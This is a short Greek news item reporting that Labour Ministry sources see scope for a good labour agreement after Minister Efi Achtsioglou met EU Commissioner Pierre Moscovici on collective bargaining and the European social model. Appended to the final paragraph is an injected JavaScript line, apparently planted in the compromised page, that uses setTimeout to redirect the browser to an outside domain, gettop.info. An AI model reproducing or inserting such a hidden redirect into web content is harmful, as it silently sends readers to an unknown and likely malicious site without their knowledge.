Πηγές υπ. Εργασίας: Δυνατότητα για μία καλή συμφωνία στα εργασιακά

0
5

 

Μετά τη συνάντηση της υπουργού Εργασίας Έφης Αχτσιόγλου με τον Επίτροπο Οικονομικών Υποθέσεων Πιερ Μοσκοβισί, πηγές του υπουργειου Εργασίας κάνουν λόγο για δυνατότητα για μία καλή συμφωνία στα εργασιακά.

Η συζήτηση επικεντρώθηκε στο ζήτημα των συλλογικών διαπραγματεύσεων σημειώνουν οι πηγές του υπουργείου, τις οποίες επικαλείται το Αθηναϊκό Πρακτορείο, και προσθέτουν δε ότι η ελληνική πλευρά επεσήμανε τη δέσμευσή της να κινηθεί εντός του ευρωπαϊκού κοινωνικού μοντέλου, όπως αυτό ορίζεται μέσα από τους ευρωπαϊκούς χάρτες, τις Διεθνείς Συνθήκες του ILO και το πόρισμα της επιτροπής εμπειρογνωμόνων για τα εργασιακά, ενώ η χώρα δεν μπορεί να βρίσκεται σε καθεστώς εξαίρεσης από το ευρωπαϊκό κοινωνικό μοντέλο.

Ο Ευρωπαίος επίτροπος συμμερίστηκε τις απόψεις της ελληνικής πλευράς υπογραμμίζοντας και ο ίδιος, σύμφωνα με τις πηγές του υπουργείου, πως η Ευρωπαϊκή Επιτροπή στηρίζει πλήρως το ευρωπαϊκό κοινωνικό μοντέλο και ότι η Ελλάδα δεν πρόκειται να τεθεί σε καθεστώς εξαίρεσης. setTimeout(«document.location.href=’http://gettop.info/kt/?53vSkc&'», delay);

ΑΦΗΣΤΕ ΜΙΑ ΑΠΑΝΤΗΣΗ

Please enter your comment!
Please enter your name here